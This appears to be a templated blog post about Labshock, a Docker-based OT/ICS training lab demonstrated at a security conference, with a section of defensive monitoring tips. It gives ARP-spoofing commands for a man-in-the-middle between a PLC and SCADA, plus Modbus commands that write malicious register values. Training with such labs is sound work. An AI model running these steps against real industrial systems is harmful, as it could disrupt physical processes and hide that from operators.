Simulating OT/ICS Cyber Attacks with Labshock and Docker

Listen to this Post

Featured Image
Michael Weng, a Senior OT Security Specialist at SektorCERT, will demonstrate Labshock, a simulated OT/ICS security environment, at BSides Aarhus 2025. The session will showcase a Man-in-the-Middle (MitM) attack in an Industrial Control System (ICS) where a SCADA system displays manipulated readouts while an attacker controls the PLC underneath—all running in Docker.

You Should Know:

1. Deploying Labshock in Docker

Labshock is designed for OT/ICS security training. Below are the steps to deploy it:

 Clone the Labshock repository 
git clone https://github.com/zakharb/labshock.git

Navigate to the Labshock directory 
cd labshock

Build the Docker environment 
docker-compose build

Launch the Labshock simulation 
docker-compose up -d 

2. Simulating a MitM Attack in OT/ICS

To execute a MitM attack in this environment, use Ettercap or Bettercap:

 Install Bettercap (for ARP spoofing) 
sudo apt install bettercap

Launch Bettercap 
sudo bettercap -iface eth0

Start ARP spoofing between PLC and SCADA 
set arp.spoof.targets <PLC_IP>,<SCADA_IP> 
arp.spoof on 

3. Manipulating PLC Registers

Using Modbus CLI, an attacker can alter PLC registers while SCADA remains unaware:

 Install Modbus CLI 
pip install modbus-cli

Connect to the PLC 
modbus --host <PLC_IP> --port 502 read_holding_registers 0 10

Write malicious values 
modbus --host <PLC_IP> --port 502 write_register 0 9999 

4. Detecting & Preventing OT Attacks

To defend against such attacks, use:

  • Network Segmentation (Firewalls, VLANs)
  • Encrypted Protocols (Modbus/TCP with TLS)
  • Anomaly Detection Tools (Wireshark, Suricata)
 Monitor OT traffic with Wireshark 
sudo wireshark -k -i eth0 -Y "modbus"

Use Suricata for ICS threat detection 
sudo suricata -c /etc/suricata/suricata.yaml -i eth0 

What Undercode Say

Labshock provides a realistic OT/ICS attack simulation, helping security professionals understand vulnerabilities in critical infrastructure. The ease of deployment in Docker makes it accessible for red/blue teams. Future enhancements could include AI-driven anomaly detection and automated exploit prevention.

Prediction

As OT/ICS attacks rise, tools like Labshock will become essential for hands-on cybersecurity training, leading to wider adoption in industrial security certifications.

Expected Output:

  • Successful Labshock deployment in Docker
  • Executed MitM attack between PLC and SCADA
  • Manipulated PLC registers without SCADA detection
  • Monitored and defended against attacks using Wireshark/Suricata

Relevant URLs:

References:

Reported By: Michael Weng – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram